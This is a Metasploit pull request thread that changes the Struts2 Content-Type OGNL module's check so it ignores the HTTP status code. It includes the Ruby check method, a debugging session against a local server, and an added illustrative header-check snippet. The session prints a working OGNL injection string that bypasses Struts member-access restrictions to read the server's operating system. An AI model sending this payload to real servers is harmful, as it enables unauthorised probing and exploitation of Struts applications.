
struts2_content_type_ognl: Don't care about response code #12008

Merged
merged 1 commit into from Jun 25, 2019

@egypt
Contributor

commented Jun 24, 2019

I found one that returned a 302 instead of 200

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/multi/http/struts2_content_type_ognl
  • check
  • Verify shows vuln even if the thing returns a 302
Don't worry about response code
I found one that returned a 302

@wvu-r7 wvu-r7 self-assigned this Jun 25, 2019

@wvu-r7

Contributor

commented Jun 25, 2019

msf5 exploit(multi/http/struts2_content_type_ognl) > check

From: /rapid7/metasploit-framework/modules/exploits/multi/http/struts2_content_type_ognl.rb @ line 75 Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule#check:

    62: def check
    63:   var_a = rand_text_alpha_lower(4)
    64:
    65:   ognl = ""
    66:   ognl << %q|(#os=@java.lang.System@getProperty('os.name')).|
    67:   ognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))|
    68:
    69:   begin
    70:     resp = send_struts_request(ognl)
    71:   rescue Msf::Exploit::Failed
    72:     return Exploit::CheckCode::Unknown
    73:   end
    74:
 => 75:   require 'pry'; binding.pry
    76:
    77:   if resp && resp.headers && resp.headers[var_a]
    78:     vprint_good("Victim operating system: #{resp.headers[var_a]}")
    79:     Exploit::CheckCode::Vulnerable
    80:   else
    81:     Exploit::CheckCode::Safe
    82:   end
    83: end

[1] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)> resp.code = 302
=> 302
[2] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)> resp.headers[var_a] = 'ping egypt'
=> "ping egypt"
[3] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)> resp
=> #<Rex::Proto::Http::Response:0x00007fac4633f690
 @auto_cl=true,
 @body=
  "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\">\n<html>\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">\n<title>Directory listing for /</title>\n</head>\n<body>\n<h1>Directory listing for /</h1>\n<hr>\n<ul>\n</ul>\n<hr>\n</body>\n</html>\n",
 @body_bytes_left=0,
 @bufq="",
 @chunk_max_size=10,
 @chunk_min_size=1,
 @code=302,
 @count_100=0,
 @headers={"Server"=>"SimpleHTTP/0.6 Python/3.7.3", "Date"=>"Tue, 25 Jun 2019 05:52:35 GMT", "Content-type"=>"text/html; charset=utf-8", "Content-Length"=>"297", "ocfn"=>"ping egypt"},
 @inside_chunk=false,
 @max_data=1048576,
 @message="OK",
 @peerinfo={"addr"=>"127.0.0.1", "port"=>8080},
 @proto="1.0",
 @request=
  "GET / HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\nContent-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#os=@java.lang.System@getProperty('os.name')).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('ocfn', #os))}\r\nX-JZSZ: \r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n",
 @state=3,
 @transfer_chunked=false>
[4] pry(#<Msf::Modules::Exploit__Multi__Http__Struts2_content_type_ognl::MetasploitModule>)>

[+] Victim operating system: ping egypt
[+] 127.0.0.1:8080 - The target is vulnerable.
msf5 exploit(multi/http/struts2_content_type_ognl) >
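The session above shows why the module's check only looks at the reflected header: the probe asks the server to add a response header named after a random marker (ocfn in this run), and the status code carries no signal. The following is an added illustration written for this thread, not code from the PR or from the Metasploit module. It replaces Rex::Proto::Http::Response with a small Struct and a minimal raw-response parser (both assumptions), uses constructed sample responses, and reuses the marker name ocfn seen in the pry output. It shows a 302 with the marker header still being reported as vulnerable, a clean 200 as safe, and a missing or unparseable response as unknown.

```ruby
# Added illustration, not code from the Metasploit module or this PR.
# Rex::Proto::Http::Response is replaced by a plain Struct (assumption).
Response = Struct.new(:code, :headers, :body)

# Parse a raw HTTP/1.x response into the Struct. Header names are
# downcased so the lookup below is case-insensitive, as HTTP requires.
# Returns nil when the status line is not a valid HTTP status line.
def parse_http_response(raw)
  head, body = raw.split("\r\n\r\n", 2)
  lines = head.split("\r\n")
  status = lines.shift.to_s
  m = status.match(%r{\AHTTP/\d\.\d (\d{3})})
  return nil unless m

  headers = {}
  lines.each do |line|
    name, value = line.split(':', 2)
    next unless value
    headers[name.strip.downcase] = value.strip
  end
  Response.new(m[1].to_i, headers, body.to_s)
end

# Check-result labels standing in for Exploit::CheckCode (assumption).
CHECK_CODES = { vulnerable: 'Vulnerable', safe: 'Safe', unknown: 'Unknown' }.freeze

# Decide the result from the response alone. The status code is deliberately
# never consulted: the only signal is whether the marker header the probe
# asked the server to add is present in the reply.
def check_marker_header(resp, marker)
  return CHECK_CODES[:unknown] if resp.nil?

  resp.headers[marker.downcase] ? CHECK_CODES[:vulnerable] : CHECK_CODES[:safe]
end

# Constructed sample responses (not real captures). SAMPLE_302 mirrors the
# case this PR addresses: a redirect that still carries the marker header.
SAMPLE_302 = "HTTP/1.0 302 Found\r\nLocation: /login\r\nServer: example\r\n" \
             "Ocfn: Linux\r\nContent-Length: 0\r\n\r\n"
SAMPLE_200_CLEAN = "HTTP/1.1 200 OK\r\nServer: example\r\nContent-Length: 2\r\n\r\nok"

if __FILE__ == $PROGRAM_NAME
  marker = 'ocfn'
  [SAMPLE_302, SAMPLE_200_CLEAN].each do |raw|
    resp = parse_http_response(raw)
    puts "#{resp.code} -> #{check_marker_header(resp, marker)}"
  end
end
```

The same reasoning applies on the defensive side: a detection that discards non-200 replies before inspecting headers would miss exactly the redirecting host that prompted this change, so header inspection should run on every response regardless of status.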

@wvu-r7 wvu-r7 merged commit 303bfaa into rapid7:master Jun 25, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed

wvu-r7 added a commit that referenced this pull request Jun 25, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 25, 2019

@wvu-r7

Contributor

commented Jun 25, 2019

Release Notes

The exploit/multi/http/struts2_content_type_ognl module now ignores the response code while checking for the vulnerability, since a 302 (instead of a 200) code was seen in the wild.
